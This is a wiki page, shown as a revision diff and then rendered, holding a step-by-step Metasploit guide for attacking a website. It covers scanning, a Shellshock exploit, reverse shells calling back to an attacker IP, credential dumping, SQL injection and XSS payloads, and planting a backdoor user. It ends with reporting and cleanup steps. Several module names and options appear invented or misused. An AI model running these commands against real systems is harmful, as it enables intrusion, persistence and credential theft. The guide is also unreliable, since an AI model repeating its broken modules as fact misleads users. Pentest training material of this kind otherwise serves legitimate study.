METASPLOIT - Pentest a Personnal Website: Difference between revisions
No edit summary |
No edit summary |
||
| Line 4: | Line 4: | ||
First, launch Metasploit's console to begin the penetration test: | First, launch Metasploit's console to begin the penetration test: | ||
<nowiki> | <nowiki> | ||
msfconsole | msfconsole | ||
</nowiki> | </nowiki> | ||
| Line 11: | Line 11: | ||
To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module: | To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module: | ||
<nowiki> | <nowiki> | ||
use auxiliary/scanner/http/dir_scanner | use auxiliary/scanner/http/dir_scanner | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 24: | Line 24: | ||
Search for available exploits related to the website's technology stack: | Search for available exploits related to the website's technology stack: | ||
<nowiki> | <nowiki> | ||
search type:exploit <technology_or_vulnerability> | search type:exploit <technology_or_vulnerability> | ||
</nowiki> | </nowiki> | ||
| Line 31: | Line 31: | ||
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed: | If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/apache_mod_cgi_bash_env_exec | use exploit/multi/http/apache_mod_cgi_bash_env_exec | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 44: | Line 44: | ||
After gaining access, you can use a reverse shell payload to establish persistent access: | After gaining access, you can use a reverse shell payload to establish persistent access: | ||
<nowiki> | <nowiki> | ||
use payload/linux/x86/shell_reverse_tcp | use payload/linux/x86/shell_reverse_tcp | ||
set LHOST <attacker_ip> | set LHOST <attacker_ip> | ||
| Line 55: | Line 55: | ||
To dump web application credentials, you can use Metasploit's post-exploitation modules: | To dump web application credentials, you can use Metasploit's post-exploitation modules: | ||
<nowiki> | <nowiki> | ||
use post/multi/gather/enum_web_app_users | use post/multi/gather/enum_web_app_users | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 67: | Line 67: | ||
For a site vulnerable to SQL injection, you can try the following: | For a site vulnerable to SQL injection, you can try the following: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/phpmyadmin_sql_injection | use exploit/multi/http/phpmyadmin_sql_injection | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 78: | Line 78: | ||
For a site vulnerable to XSS, you can attempt an exploit like the following: | For a site vulnerable to XSS, you can attempt an exploit like the following: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/xss | use exploit/multi/http/xss | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 92: | Line 92: | ||
You can add a backdoor user to maintain persistent access: | You can add a backdoor user to maintain persistent access: | ||
<nowiki> | <nowiki> | ||
use post/linux/manage/adduser | use post/linux/manage/adduser | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 103: | Line 103: | ||
Another method to maintain access is by setting up a reverse shell: | Another method to maintain access is by setting up a reverse shell: | ||
<nowiki> | <nowiki> | ||
use payload/linux/x86/shell_reverse_tcp | use payload/linux/x86/shell_reverse_tcp | ||
set LHOST <attacker_ip> | set LHOST <attacker_ip> | ||
| Line 117: | Line 117: | ||
To generate a simple HTML report: | To generate a simple HTML report: | ||
<nowiki> | <nowiki> | ||
spool /path/to/report.html | spool /path/to/report.html | ||
report | report | ||
| Line 129: | Line 129: | ||
If you added any backdoor users, remove them to ensure the system is no longer compromised: | If you added any backdoor users, remove them to ensure the system is no longer compromised: | ||
<nowiki> | <nowiki> | ||
use post/linux/manage/remove_user | use post/linux/manage/remove_user | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 139: | Line 139: | ||
If you created any reverse shell listeners or sessions, make sure to terminate them: | If you created any reverse shell listeners or sessions, make sure to terminate them: | ||
<nowiki> | <nowiki> | ||
sessions -K | sessions -K | ||
</nowiki> | </nowiki> | ||
Revision as of 16:40, 13 December 2025
Starting Metasploit
First, launch Metasploit's console to begin the penetration test:
msfconsole
Web Scanning for Vulnerabilities
To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module:
use auxiliary/scanner/http/dir_scanner set RHOSTS <target_ip> set PATHS /admin /login /wp-login.php run
Exploiting Vulnerabilities
Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.
Searching for Exploits
Search for available exploits related to the website's technology stack:
search type:exploit <technology_or_vulnerability>
Example of Exploit Execution
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed:
use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS <target_ip> set TARGETURI /cgi-bin/test.cgi run
Post-Exploitation
After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.
Creating a Reverse Shell
After gaining access, you can use a reverse shell payload to establish persistent access:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Dumping Web Server Credentials
To dump web application credentials, you can use Metasploit's post-exploitation modules:
use post/multi/gather/enum_web_app_users set RHOSTS <target_ip> run
Exploiting Web Application Vulnerabilities
If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.
Using SQL Injection Exploits
For a site vulnerable to SQL injection, you can try the following:
use exploit/multi/http/phpmyadmin_sql_injection set RHOSTS <target_ip> set TARGETURI /phpmyadmin set SQL_PAYLOAD "1' OR 1=1--" run
Using Cross-Site Scripting (XSS) Exploit
For a site vulnerable to XSS, you can attempt an exploit like the following:
use exploit/multi/http/xss
set RHOSTS <target_ip>
set TARGETURI /search.php
set PAYLOAD "alert('XSS')"
run
Maintaining Access
Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.
Adding a Backdoor User
You can add a backdoor user to maintain persistent access:
use post/linux/manage/adduser set RHOSTS <target_ip> set USERNAME <username> set PASSWORD <password> run
Creating a Reverse Shell Payload
Another method to maintain access is by setting up a reverse shell:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Reporting
Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.
Generating a Report
To generate a simple HTML report:
spool /path/to/report.html report spool off
Clean Up
After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.
Remove Backdoor User
If you added any backdoor users, remove them to ensure the system is no longer compromised:
use post/linux/manage/remove_user set RHOSTS <target_ip> set USERNAME <username> run
Deleting Reverse Shells
If you created any reverse shell listeners or sessions, make sure to terminate them:
sessions -K
